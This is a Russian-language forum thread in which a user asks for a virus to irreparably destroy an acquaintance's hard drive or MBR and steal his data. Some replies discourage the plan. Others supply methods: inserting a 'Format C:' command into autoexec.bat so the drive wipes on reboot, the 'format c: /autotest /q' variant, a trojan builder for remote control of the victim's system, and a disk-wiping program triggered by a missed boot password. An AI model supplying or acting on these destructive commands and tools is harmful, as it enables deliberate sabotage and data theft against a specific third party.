Наши преимущества

Нужен вирус для убивания фс

ilivit

Турист
Credits
0
Возникла небольшая проблемка с одним "знакомым"(конфликт так сказать=)). Так вот надо ему подпортить хард, да лучше так, чтоб инфу не восстановить, ну или хотябы MBR. Где взять что нибудь подходящее?

ой не хорошо это, уж лучше за пивом найти общий язык

честно скажу, не сторонник такого решения вопросов, уж больно часто поднимаю винты :)

может проще с ним впрямую поговрить.
а то такой способ тебе плюса не дает

Дело в том, что поговорить с ним не получится(ну совсем никак). Нужно просто сломать ему винт, и ,по возможности, спереть оттуда инфу. А вообще это надо не конкретно мне, а одним знакомым: он им насолил и разговор врядли получится.

ilivit, ну так пусть они и разбираются между собой, так и виноватым стать не долго :)

такой вирус в работе видел, но возможности спереть он не давал

741 сказал(а):
так и виноватым стать не долго :)
"А я чего? Я, ничего."(с) Это я просто так спросил, интересно ведь(хе-хе)

741 сказал(а):
такой вирус в работе видел, но возможности спереть он не давал
Это случайно не "Чернобыль"? Если нет, можешь поделиться или информацию подкинуть? А то, что спереть не дает - я не про него, а про троян.

открваешь файл autoexe.bat пишешь в нём:
echo on;Format C: | y
и наслаждаешься..
псоле перезагрузки винт форматируеца сам без спроса.....

запускаешь unformat и всё на месте, без шума и пыли :)

Если поспорили -можно либо за пивом договориться,либо интерфейс ему попортить.Винт то причем.....Не виноватый он.Да и гаденько как то выглядит.

открваешь файл autoexe.bat пишешь в нём:
echo on;Format C: | y
и наслаждаешься..
псоле перезагрузки винт форматируеца сам без спроса.....

Вроде можно сделать это так: format c: /autotest ещё атрибут /q можно добавить для быстрой смерти.

Хотя это только на 98 и ниже виндах сработает.

Когда то хотел проэксперементировать, но пропала надобность. Ищещь Trojan-конструктор :) Lammer's Death. С помощью онного внедряешь в любую прогу часть червя, а потом удалённо играешся с системой. Но это было давно. Наверно такие лазейки уже прикрыты.

если есть доступ к компьютеру попробуй установи программу Hara-Kiri и поставить под защиту все диски,если потом во время загрузки не ввести пароль,то Hara-Kiri стерает всю информацию,версию 2.01 рабочую можно найти в сети,а на 2.02 кряка не встречал

Верх